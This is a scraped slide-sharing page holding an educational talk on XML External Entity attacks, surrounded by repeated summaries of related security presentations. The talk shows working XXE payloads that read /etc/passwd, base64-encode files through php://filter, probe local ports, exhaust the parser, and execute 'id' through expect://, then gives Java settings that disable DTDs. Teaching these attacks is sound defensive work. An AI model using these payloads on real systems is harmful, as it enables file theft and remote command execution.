This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. The key point is that inputs may come from sources beyond just user input, and outputs may contain sensitive information, so all data processed across layers needs to be carefully validated. Specific examples are provided of vulnerabilities the author has discovered in how various popular systems handle specific inputs or transformations at each layer.
This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. Many real-world examples are provided of how inputs passed between layers can bypass validation checks if the layers' data processing rules are not well understood by developers. The key message is that all variables not explicitly set in code should be considered untrusted.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
This document summarizes vulnerabilities related to server-side request forgery (SSRF) attacks and how they can be exploited. It discusses how external network access and internal network access can be obtained through SSRF. It provides examples of vulnerabilities in various protocols like HTTP, FTP, TFTP, and protocols used by services like Memcached, databases, and file uploads. It also describes how file descriptors can be used to write to open sockets or files to forge server responses or inject malicious content. Overall, the document is an overview of real-world SSRF attacks and exploitation techniques.
This document summarizes XML out-of-band data retrieval attacks using XML external entities. It discusses how XML external entities can be used to retrieve files from remote servers or make requests to external resources. It also covers how entities defined in attributes can be used to bypass restrictions on external entity references. The document demonstrates these attack techniques and outlines tools that can automate XML out-of-band exploitation.
This document provides an overview of implementing the OSSEC HIDS (Host-based Intrusion Detection System). It discusses OSSEC's architecture, features like log analysis, integrity monitoring, rootkit detection, policy auditing and alerts. It also covers installing and configuring OSSEC servers and agents, as well as customizing configuration and rule files. Challenges of deploying OSSEC at large scale are also mentioned.
Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. The key point is that inputs may come from sources beyond just user input, and outputs may contain sensitive information, so all data processed across layers needs to be carefully validated. Specific examples are provided of vulnerabilities the author has discovered in how various popular systems handle specific inputs or transformations at each layer.
This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. Many real-world examples are provided of how inputs passed between layers can bypass validation checks if the layers' data processing rules are not well understood by developers. The key message is that all variables not explicitly set in code should be considered untrusted.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
This document summarizes vulnerabilities related to server-side request forgery (SSRF) attacks and how they can be exploited. It discusses how external network access and internal network access can be obtained through SSRF. It provides examples of vulnerabilities in various protocols like HTTP, FTP, TFTP, and protocols used by services like Memcached, databases, and file uploads. It also describes how file descriptors can be used to write to open sockets or files to forge server responses or inject malicious content. Overall, the document is an overview of real-world SSRF attacks and exploitation techniques.
This document summarizes XML out-of-band data retrieval attacks using XML external entities. It discusses how XML external entities can be used to retrieve files from remote servers or make requests to external resources. It also covers how entities defined in attributes can be used to bypass restrictions on external entity references. The document demonstrates these attack techniques and outlines tools that can automate XML out-of-band exploitation.
This document provides an overview of implementing the OSSEC HIDS (Host-based Intrusion Detection System). It discusses OSSEC's architecture, features like log analysis, integrity monitoring, rootkit detection, policy auditing and alerts. It also covers installing and configuring OSSEC servers and agents, as well as customizing configuration and rule files. Challenges of deploying OSSEC at large scale are also mentioned.
Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
Thick Application Penetration Testing - A Crash CourseNetSPI
This document provides an overview of penetration testing thick applications. It discusses why thick apps present unique risks compared to web apps, common thick app architectures, and how to access and test various components of thick apps including the GUI, files, registry, network traffic, memory, and configurations. A variety of tools are listed that can be used for tasks like decompiling, injecting code, and exploiting excessive privileges. The document concludes with recommendations such as never storing sensitive data in assemblies and being careful when deploying thick apps via terminal services.
ASP.NET websites can be vulnerable to attacks like file inclusion and remote code execution if they do not properly sanitize user-supplied input, as features like Response.WriteFile and Server.Execute could allow an attacker to read arbitrary files or execute code if passed a malicious file path. The ViewState, Request Validation, and Event Validation features also have weaknesses that could allow attacks like cross-site scripting or request forgery if not implemented correctly.
This document provides information about a PowerShell presentation titled "Powering up on PowerShell". It includes the wireless network credentials to access the demo environment, a link to demo files, an agenda for the presentation topics, and a brief biography of the presenter. Some of the topics to be covered in the presentation include moving around the file system and registry, hashing, data storage techniques, custom event logging, WinRM logging, port scanning, and achieving persistence through PowerShell profiles.
The document discusses testing the security of web services. It covers topics like web service basics, why web services should be tested, old and new techniques for attacking web services like client testing, web method enumeration, XML port scanning, and the need for a structured security testing framework for web services.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
Ever wanted to find out someone’s IP address online? Of course you have! Tracing “calls” on the Internet is much more complicated than on the plain old telephone network. This expose` includes a history of traditional techniques used to discover the IP address of a target user in: chat rooms, forums and other types of social networking sites. Attention will be centered around a fundamental weakness in the IRC protocol that allows client IP addresses to be determined. Proof-of-concept samples targetting multiple IRC daemons will be released. Prizes will be awarded to the most interesting submissions for an online edition of ‘Spot The Fed.’
Bio: At the time of writing, Derek is currently an independent security contractor (and in the past for @stake and Symantec.) He’s written various tool packages including a Linux stealth patch to evade nmap’s transport layer OS detection as well as porkbind, a nameserver security scanner. In 2007, he won Cenzic’s SANS contest.
Application and Website Security -- Fundamental EditionDaniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
Today most networks present one “gateway” to the whole network – The SSL-VPN. A vector that is often overlooked and considered “secure”, we decided to take apart an industry leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN Appliance. We discover that even though many security protections are in-place, the internals of the appliance hides interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file-system and begin examining the environment. As we go down the rabbit hole, our misconceptions about “security appliances” are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of fortune 500 companies, we contacted F5 and received one of the best vendor responses we’ve experienced – EVER!
https://www.hackitoergosum.org
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017AgileNZ Conference
For too long, audits and security reviews have been seen as resistant to the frequent release of software. Auditors require access to static systems and environments, which would seem to make continuous delivery impossible. Too frequently audits are a fire drill sampling of the current state and temporary fixes are put in place to appease the compliance audit without being integrated into future releases.
About Matt Ray:
Matt Ray is the Manager and Solutions Architect for Asia Pacific and Japan for Chef. He has worked in large enterprise software companies and founded his own startups in a wide variety of industries including banking, retail and government.
He has been active in open source communities for over two decades and has spoken at, and helped organise, many conferences and Meetups. He currently resides in Sydney, Australia after relocating from Austin, Texas. He podcasts at SoftwareDefinedTalk.com, blogs at LeastResistance.net and is @mattray on Twitter, IRC, GitHub and too many Slacks.
This document summarizes a PowerShell presentation given at Bsides Greenville 2019. It provides wireless network credentials, links to PowerShell cheat sheets and demos, and lists the speaker's background and experience with PowerShell. The presentation agenda covers topics like moving around the file system, hashing, data storage, custom event logs, WinRM logging, port scanning, and persistence through profiles.
This document provides an introduction to dynamic web content and web application technologies. It discusses how web servers, browsers, HTML, CSS, JavaScript, and other technologies work together to deliver dynamic web pages and applications to users. Key points covered include how browsers make HTTP requests to servers, how servers respond with HTML documents, and how languages like JavaScript can be used to add interactivity to web pages. Network concepts like TCP connections, ports, and IP addresses are also briefly summarized.
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
This document discusses techniques used by threat actors to move laterally within corporate networks. It begins with an introduction and covers post-exploitation techniques including Mimikatz for credential theft, Skeleton Key and Wdigest for password dumping, webshell deployment on IIS and Exchange servers, and other miscellaneous techniques such as abusing VPNs and using rootkits. Precautions are provided for each technique discussed.
This document discusses techniques for hunting bad guys on networks, including identifying client-side attacks, malware command and control channels, post-exploitation activities, and hunting artifacts. It provides examples of using DNS logs, firewall logs, HTTP logs, registry keys, installed software inventories, and the AMCache registry hive to look for anomalous behaviors that could indicate security compromises. The goal is to actively hunt for threats rather than just detecting known bad behaviors.
This document provides information about DHCP and DNS logging. It discusses:
- Microsoft DHCP logs location and format, with limitations like one week retention
- ISC DHCP logs to syslog and examples of log entries
- DNS logging using DNSCAP or network packet captures
- Microsoft and ISC BIND DNS logging configurations and limitations
It recommends searching DHCP logs by IP address or MAC address to identify devices, and DNS logs to see domains visited and querying IPs. The document also notes attackers may change IP addresses, and malware may strip version information to evade detection.
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
This document discusses challenges and solutions related to window remote shellcode. It outlines challenges posed by antivirus software, EMET, firewalls, and IDS/IPS systems. It then describes various techniques for bypassing these protections, such as encryption, obfuscation, non-standard programming languages, and the use of tools like Meterpreter and Veil Framework payloads. Specific bypass techniques covered include DLL injection, process hollowing, reflective loading, and the use of techniques like one-way shells and HTTP stagers.
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
A Hacker's Perspective on Embedded Device Security, presented by Paul Dant of Independent Security Evaluators at the Security of Things Forum, Sept. 10, 2015
The importance of sustainable and efficient computational practices in artificial intelligence (AI) and deep learning has become increasingly critical. This webinar focuses on the intersection of sustainability and AI, highlighting the significance of energy-efficient deep learning, innovative randomization techniques in neural networks, the potential of reservoir computing, and the cutting-edge realm of neuromorphic computing. This webinar aims to connect theoretical knowledge with practical applications and provide insights into how these innovative approaches can lead to more robust, efficient, and environmentally conscious AI systems.
Webinar Speaker: Prof. Claudio Gallicchio, Assistant Professor, University of Pisa
Claudio Gallicchio is an Assistant Professor at the Department of Computer Science of the University of Pisa, Italy. His research involves merging concepts from Deep Learning, Dynamical Systems, and Randomized Neural Systems, and he has co-authored over 100 scientific publications on the subject. He is the founder of the IEEE CIS Task Force on Reservoir Computing, and the co-founder and chair of the IEEE Task Force on Randomization-based Neural Networks and Learning Systems. He is an associate editor of IEEE Transactions on Neural Networks and Learning Systems (TNNLS).
Thick Application Penetration Testing - A Crash CourseNetSPI
This document provides an overview of penetration testing thick applications. It discusses why thick apps present unique risks compared to web apps, common thick app architectures, and how to access and test various components of thick apps including the GUI, files, registry, network traffic, memory, and configurations. A variety of tools are listed that can be used for tasks like decompiling, injecting code, and exploiting excessive privileges. The document concludes with recommendations such as never storing sensitive data in assemblies and being careful when deploying thick apps via terminal services.
ASP.NET websites can be vulnerable to attacks like file inclusion and remote code execution if they do not properly sanitize user-supplied input, as features like Response.WriteFile and Server.Execute could allow an attacker to read arbitrary files or execute code if passed a malicious file path. The ViewState, Request Validation, and Event Validation features also have weaknesses that could allow attacks like cross-site scripting or request forgery if not implemented correctly.
This document provides information about a PowerShell presentation titled "Powering up on PowerShell". It includes the wireless network credentials to access the demo environment, a link to demo files, an agenda for the presentation topics, and a brief biography of the presenter. Some of the topics to be covered in the presentation include moving around the file system and registry, hashing, data storage techniques, custom event logging, WinRM logging, port scanning, and achieving persistence through PowerShell profiles.
The document discusses testing the security of web services. It covers topics like web service basics, why web services should be tested, old and new techniques for attacking web services like client testing, web method enumeration, XML port scanning, and the need for a structured security testing framework for web services.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
Ever wanted to find out someone’s IP address online? Of course you have! Tracing “calls” on the Internet is much more complicated than on the plain old telephone network. This expose` includes a history of traditional techniques used to discover the IP address of a target user in: chat rooms, forums and other types of social networking sites. Attention will be centered around a fundamental weakness in the IRC protocol that allows client IP addresses to be determined. Proof-of-concept samples targetting multiple IRC daemons will be released. Prizes will be awarded to the most interesting submissions for an online edition of ‘Spot The Fed.’
Bio: At the time of writing, Derek is currently an independent security contractor (and in the past for @stake and Symantec.) He’s written various tool packages including a Linux stealth patch to evade nmap’s transport layer OS detection as well as porkbind, a nameserver security scanner. In 2007, he won Cenzic’s SANS contest.
Application and Website Security -- Fundamental EditionDaniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
Today most networks present one “gateway” to the whole network – The SSL-VPN. A vector that is often overlooked and considered “secure”, we decided to take apart an industry leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN Appliance. We discover that even though many security protections are in-place, the internals of the appliance hides interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file-system and begin examining the environment. As we go down the rabbit hole, our misconceptions about “security appliances” are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of fortune 500 companies, we contacted F5 and received one of the best vendor responses we’ve experienced – EVER!
https://www.hackitoergosum.org
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017AgileNZ Conference
For too long, audits and security reviews have been seen as resistant to the frequent release of software. Auditors require access to static systems and environments, which would seem to make continuous delivery impossible. Too frequently audits are a fire drill sampling of the current state and temporary fixes are put in place to appease the compliance audit without being integrated into future releases.
About Matt Ray:
Matt Ray is the Manager and Solutions Architect for Asia Pacific and Japan for Chef. He has worked in large enterprise software companies and founded his own startups in a wide variety of industries including banking, retail and government.
He has been active in open source communities for over two decades and has spoken at, and helped organise, many conferences and Meetups. He currently resides in Sydney, Australia after relocating from Austin, Texas. He podcasts at SoftwareDefinedTalk.com, blogs at LeastResistance.net and is @mattray on Twitter, IRC, GitHub and too many Slacks.
This document summarizes a PowerShell presentation given at Bsides Greenville 2019. It provides wireless network credentials, links to PowerShell cheat sheets and demos, and lists the speaker's background and experience with PowerShell. The presentation agenda covers topics like moving around the file system, hashing, data storage, custom event logs, WinRM logging, port scanning, and persistence through profiles.
This document provides an introduction to dynamic web content and web application technologies. It discusses how web servers, browsers, HTML, CSS, JavaScript, and other technologies work together to deliver dynamic web pages and applications to users. Key points covered include how browsers make HTTP requests to servers, how servers respond with HTML documents, and how languages like JavaScript can be used to add interactivity to web pages. Network concepts like TCP connections, ports, and IP addresses are also briefly summarized.
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
This document discusses techniques used by threat actors to move laterally within corporate networks. It begins with an introduction and covers post-exploitation techniques including Mimikatz for credential theft, Skeleton Key and Wdigest for password dumping, webshell deployment on IIS and Exchange servers, and other miscellaneous techniques such as abusing VPNs and using rootkits. Precautions are provided for each technique discussed.
This document discusses techniques for hunting bad guys on networks, including identifying client-side attacks, malware command and control channels, post-exploitation activities, and hunting artifacts. It provides examples of using DNS logs, firewall logs, HTTP logs, registry keys, installed software inventories, and the AMCache registry hive to look for anomalous behaviors that could indicate security compromises. The goal is to actively hunt for threats rather than just detecting known bad behaviors.
This document provides information about DHCP and DNS logging. It discusses:
- Microsoft DHCP logs location and format, with limitations like one week retention
- ISC DHCP logs to syslog and examples of log entries
- DNS logging using DNSCAP or network packet captures
- Microsoft and ISC BIND DNS logging configurations and limitations
It recommends searching DHCP logs by IP address or MAC address to identify devices, and DNS logs to see domains visited and querying IPs. The document also notes attackers may change IP addresses, and malware may strip version information to evade detection.
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
This document discusses challenges and solutions related to window remote shellcode. It outlines challenges posed by antivirus software, EMET, firewalls, and IDS/IPS systems. It then describes various techniques for bypassing these protections, such as encryption, obfuscation, non-standard programming languages, and the use of tools like Meterpreter and Veil Framework payloads. Specific bypass techniques covered include DLL injection, process hollowing, reflective loading, and the use of techniques like one-way shells and HTTP stagers.
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
A Hacker's Perspective on Embedded Device Security, presented by Paul Dant of Independent Security Evaluators at the Security of Things Forum, Sept. 10, 2015
Similar to XML External Entity Null Meet 19_3_16.pptx (20)
The importance of sustainable and efficient computational practices in artificial intelligence (AI) and deep learning has become increasingly critical. This webinar focuses on the intersection of sustainability and AI, highlighting the significance of energy-efficient deep learning, innovative randomization techniques in neural networks, the potential of reservoir computing, and the cutting-edge realm of neuromorphic computing. This webinar aims to connect theoretical knowledge with practical applications and provide insights into how these innovative approaches can lead to more robust, efficient, and environmentally conscious AI systems.
Webinar Speaker: Prof. Claudio Gallicchio, Assistant Professor, University of Pisa
Claudio Gallicchio is an Assistant Professor at the Department of Computer Science of the University of Pisa, Italy. His research involves merging concepts from Deep Learning, Dynamical Systems, and Randomized Neural Systems, and he has co-authored over 100 scientific publications on the subject. He is the founder of the IEEE CIS Task Force on Reservoir Computing, and the co-founder and chair of the IEEE Task Force on Randomization-based Neural Networks and Learning Systems. He is an associate editor of IEEE Transactions on Neural Networks and Learning Systems (TNNLS).
This presentation by OECD, OECD Secretariat, was made during the discussion “The Intersection between Competition and Data Privacy” held at the 143rd meeting of the OECD Competition Committee on 13 June 2024. More papers and presentations on the topic can be found at oe.cd/ibcdp.
This presentation was uploaded with the author’s consent.
Carrer goals.pptx and their importance in real lifeartemacademy2
Career goals serve as a roadmap for individuals, guiding them toward achieving long-term professional aspirations and personal fulfillment. Establishing clear career goals enables professionals to focus their efforts on developing specific skills, gaining relevant experience, and making strategic decisions that align with their desired career trajectory. By setting both short-term and long-term objectives, individuals can systematically track their progress, make necessary adjustments, and stay motivated. Short-term goals often include acquiring new qualifications, mastering particular competencies, or securing a specific role, while long-term goals might encompass reaching executive positions, becoming industry experts, or launching entrepreneurial ventures.
Moreover, having well-defined career goals fosters a sense of purpose and direction, enhancing job satisfaction and overall productivity. It encourages continuous learning and adaptation, as professionals remain attuned to industry trends and evolving job market demands. Career goals also facilitate better time management and resource allocation, as individuals prioritize tasks and opportunities that advance their professional growth. In addition, articulating career goals can aid in networking and mentorship, as it allows individuals to communicate their aspirations clearly to potential mentors, colleagues, and employers, thereby opening doors to valuable guidance and support. Ultimately, career goals are integral to personal and professional development, driving individuals toward sustained success and fulfillment in their chosen fields.
This presentation by Thibault Schrepel, Associate Professor of Law at Vrije Universiteit Amsterdam University, was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by Yong Lim, Professor of Economic Law at Seoul National University School of Law, was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by Professor Alex Robson, Deputy Chair of Australia’s Productivity Commission, was made during the discussion “Competition and Regulation in Professions and Occupations” held at the 77th meeting of the OECD Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found at oe.cd/crps.
This presentation was uploaded with the author’s consent.
XP 2024 presentation: A New Look to Leadershipsamililja
Presentation slides from XP2024 conference, Bolzano IT. The slides describe a new view to leadership and combines it with anthro-complexity (aka cynefin).
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...Suzanne Lagerweij
This is a workshop about communication and collaboration. We will experience how we can analyze the reasons for resistance to change (exercise 1) and practice how to improve our conversation style and be more in control and effective in the way we communicate (exercise 2).
This session will use Dave Gray’s Empathy Mapping, Argyris’ Ladder of Inference and The Four Rs from Agile Conversations (Squirrel and Fredrick).
Abstract:
Let’s talk about powerful conversations! We all know how to lead a constructive conversation, right? Then why is it so difficult to have those conversations with people at work, especially those in powerful positions that show resistance to change?
Learning to control and direct conversations takes understanding and practice.
We can combine our innate empathy with our analytical skills to gain a deeper understanding of complex situations at work. Join this session to learn how to prepare for difficult conversations and how to improve our agile conversations in order to be more influential without power. We will use Dave Gray’s Empathy Mapping, Argyris’ Ladder of Inference and The Four Rs from Agile Conversations (Squirrel and Fredrick).
In the session you will experience how preparing and reflecting on your conversation can help you be more influential at work. You will learn how to communicate more effectively with the people needed to achieve positive change. You will leave with a self-revised version of a difficult conversation and a practical model to use when you get back to work.
Come learn more on how to become a real influencer!
This presentation by Nathaniel Lane, Associate Professor in Economics at Oxford University, was made during the discussion “Pro-competitive Industrial Policy” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/pcip.
This presentation was uploaded with the author’s consent.
This presentation by OECD, OECD Secretariat, was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by Professor Giuseppe Colangelo, Jean Monnet Professor of European Innovation Policy, was made during the discussion “The Intersection between Competition and Data Privacy” held at the 143rd meeting of the OECD Competition Committee on 13 June 2024. More papers and presentations on the topic can be found at oe.cd/ibcdp.
This presentation was uploaded with the author’s consent.
This presentation by Juraj Čorba, Chair of OECD Working Party on Artificial Intelligence Governance (AIGO), was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by OECD, OECD Secretariat, was made during the discussion “Competition and Regulation in Professions and Occupations” held at the 77th meeting of the OECD Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found at oe.cd/crps.
This presentation was uploaded with the author’s consent.
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
XML External Entity Null Meet 19_3_16.pptx
1. XML eXternal Entity Attack (XXE)
By:
Samit Anwer
samit.anwer@gmail.com
and other related attacks
2. Agenda
• Document Type Definition
• Prerequisites to perform an XXE attack
• Outcomes
• Fixing XXE vulnerabilities
3. Document Type Definition (DTD)
Internal DTD External DTD
DTD defines the structure - legal elements, entities and attributes of an XML doc
4. • Common references shared between multiple XML documents
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM
"http://www.xmlwriter.net/copyright.xml"> ]>
<copyright>&c;</copyright>
Why External Entities?
• Security issues arise because PHP places no restrictions on what URLs can
be accessed, even if allow_url_fopen is set to false in php.ini
5. Prerequisites to perform an XXE
• The application parses XML documents
• Tainted data is allowed within the system identifier of the entity, within the DTD
• The XML processor is configured to validate and process the DTD
• The XML processor is configured to resolve external entities within the DTD
6. • Disclosure of confidential data / file inclusion
• Server Side Request Forgery (SSRF)
• Port Scanning
• DoS on the parsing system
• Remote Code Execution
Outcomes
7. File inclusion
• local file must be valid XML
• What if it is not?
• It is possible to encode binary files as a Base64 encoded string
• What if the confidential file is not reflected in the response?
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan>
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
Back
DEMO
8. SSRF
• an attacker has the ability to create requests from the vulnerable server
Back
DEMO
Go to Appendix
9. Port Scanning
• It is possible to specify ports to which the XML parser will connect
• As long as PHP error messages are enabled you get back the banner of the service
running even if the port doesn't support the HTTP protocol
• What if error messages are disabled?
Time is your friend!
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed!
SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
Back
10. DoS
• Billion laughs attack
• Try opening file:///dev/random
https://en.wikipedia.org/wiki/Billion_laughs
Back
11. Remote Code Execution
<!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
<methodCall>
<methodName>&foo;</methodName>
</methodCall>
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>
faultString</name><value>
<string>Method "uid=33(www-data) gid=33(www-data) groups=33(www-data)
" does not exist</string>
</value></member></struct></value></fault></methodResponse>
Request:
Response:
Back
12. Fixes – JAVA
• Disable DTDs
• If it is not possible to disable DTDs completely, then
• Disable external entity
• Disable external DTDs
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities" , false);
factory.setFeature(“http://apache.org/xml/features/nonvalidating/load-external-dtd” , false);
An XML External Entity attack is a type of attack against an application that parses XML input
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser
The system identifier is assumed to be a URI that can be dereferenced by the XML processor when processing the entity
XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier
If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information
This extension allows to interact with processes through PTY.